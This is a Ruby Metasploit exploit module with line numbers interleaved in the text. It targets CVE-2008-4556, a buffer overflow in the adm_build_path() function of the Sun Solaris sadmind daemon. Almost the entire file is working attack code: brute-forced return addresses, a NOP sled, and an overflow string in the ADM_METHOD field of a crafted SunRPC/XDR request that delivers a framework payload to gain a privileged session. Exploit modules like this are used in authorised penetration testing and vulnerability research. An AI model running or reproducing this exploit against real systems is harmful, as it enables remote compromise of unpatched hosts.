1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::SunRPC
10
  include Msf::Exploit::Brute
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Sun Solaris sadmind adm_build_path() Buffer Overflow',
17
        'Description' => %q{
18
          This module exploits a buffer overflow vulnerability in adm_build_path()
19
          function of Sun Solstice AdminSuite sadmind daemon.
20

21
          The distributed system administration daemon (sadmind) is the daemon used by
22
          Solstice AdminSuite applications to perform distributed system administration
23
          operations.
24

25
          The sadmind daemon is started automatically by the inetd daemon whenever a
26
          request to invoke an operation is received. The sadmind daemon process
27
          continues to run for 15 minutes after the last request is completed, unless a
28
          different idle-time is specified with the -i command line option. The sadmind
29
          daemon may be started independently from the command line, for example, at
30
          system boot time. In this case, the -i option has no effect; sadmind continues
31
          to run, even if there are no active requests.
32
        },
33
        'Author' => [
34
          'Ramon de C Valle',
35
          'Adriano Lima <adriano[at]risesecurity.org>',
36
        ],
37
        'Arch' => ARCH_X86,
38
        'Platform' => 'solaris',
39
        'References' => [
40
          ['CVE', '2008-4556'],
41
          ['OSVDB', '49111'],
42
          ['URL', 'https://web.archive.org/web/20081201000000*/https://risesecurity.org/advisories/RISE-2008001.txt'],
43
        ],
44
        'Privileged' => true,
45
        'License' => MSF_LICENSE,
46
        'Payload' => {
47
          'Space' => 1024,
48
          'BadChars' => "\x00"
49
        },
50
        'Targets' => [
51
          [
52
            'Sun Solaris 9 x86 Brute Force',
53
            {
54
              'Arch' => [ ARCH_X86 ],
55
              'Platform' => 'solaris',
56
              'Nops' => 1024 * 32,
57
              'Bruteforce' =>
58
                {
59
                  'Start' => { 'Ret' => 0x08062030 },
60
                  'Stop' => { 'Ret' => 0x08072030 },
61
                  'Step' => 1024 * 30
62
                }
63
            }
64
          ],
65
          [
66
            'Sun Solaris 9 x86',
67
            {
68
              'Nops' => 1024 * 4,
69
              'Bruteforce' =>
70
                {
71
                  'Start' => { 'Ret' => 0x08066a60 + 2048 },
72
                  'Stop' => { 'Ret' => 0x08066a60 + 2048 },
73
                  'Step' => 1
74
                }
75
            }
76
          ],
77
          [
78
            'Debug',
79
            {
80
              'Nops' => 1024 * 4,
81
              'Bruteforce' =>
82
                {
83
                  'Start' => { 'Ret' => 0xaabbccdd },
84
                  'Stop' => { 'Ret' => 0xaabbccdd },
85
                  'Step' => 1
86
                }
87
            }
88
          ],
89
        ],
90
        'DefaultTarget' => 0,
91
        'DisclosureDate' => '2008-10-14',
92
        'Notes' => {
93
          'Stability' => [CRASH_SERVICE_RESTARTS],
94
          'Reliability' => [REPEATABLE_SESSION],
95
          'SideEffects' => [IOC_IN_LOGS]
96
        }
97
      )
98
    )
99
  end
100

101
  def check
102
    port = sunrpc_create('udp', 100232, 10)
103
    port.nil? ? CheckCode::Safe : CheckCode::Detected
104
  ensure
105
    sunrpc_destroy unless rpcobj.nil?
106
  end
107

108
  def brute_exploit(brute_target)
109
    begin
110
      sunrpc_create('udp', 100232, 10)
111
    rescue Rex::Proto::SunRPC::RPCTimeout, Rex::Proto::SunRPC::RPCError => e
112
      vprint_error(e.to_s)
113
      return
114
    end
115

116
    unless @nops
117
      print_status('Creating nop block...')
118
      if target['Nops'] > 0
119
        @nops = make_nops(target['Nops'])
120
      else
121
        @nops = ''
122
      end
123
    end
124

125
    print_status('Trying to exploit sadmind with address 0x%.8x...' % brute_target['Ret'])
126

127
    hostname = 'localhost'
128

129
    # buf1 = rand_text_alpha(1017) + [brute_target['Ret']].pack('L')
130
    buf1 = 'A' * 1017 + [brute_target['Ret']].pack('L')
131
    buf2 = @nops + payload.encoded
132

133
    header = Rex::Encoder::XDR.encode(0) * 7
134
    header << Rex::Encoder::XDR.encode(
135
      6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
136
      4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
137
      hostname, 'system', rand_text_alpha(16)
138
    )
139

140
    body =
141
      do_int('ADM_FW_VERSION', 1) +
142
      do_string('ADM_LANG', 'C') +
143
      do_string('ADM_REQUESTID', '00009:000000000:0') +
144
      do_string('ADM_CLASS', 'system') +
145
      do_string('ADM_CLASS_VERS', '2.1') +
146
      do_string('ADM_METHOD', buf1) +
147
      do_string('ADM_HOST', hostname) +
148
      do_string('ADM_CLIENT_HOST', hostname) +
149
      do_string('ADM_CLIENT_DOMAIN', '') +
150
      do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
151
      do_int('ADM_FENCE', 0) +
152
      do_string('X', buf2) +
153
      Rex::Encoder::XDR.encode('netmgt_endofargs')
154

155
    request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
156

157
    begin
158
      # two seconds timeout for brute force
159
      sunrpc_call(1, request, 2)
160
    rescue Rex::Proto::SunRPC::RPCTimeout
161
      print_status('Server did not respond, this is expected')
162
    rescue Rex::Proto::SunRPC::RPCError => e
163
      print_error(e.to_s)
164
    end
165
  ensure
166
    sunrpc_destroy unless rpcobj.nil?
167
  end
168

169
  def do_string(str1, str2)
170
    Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
171
  end
172

173
  def do_int(str, int)
174
    Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
175
  end
176
end
177

178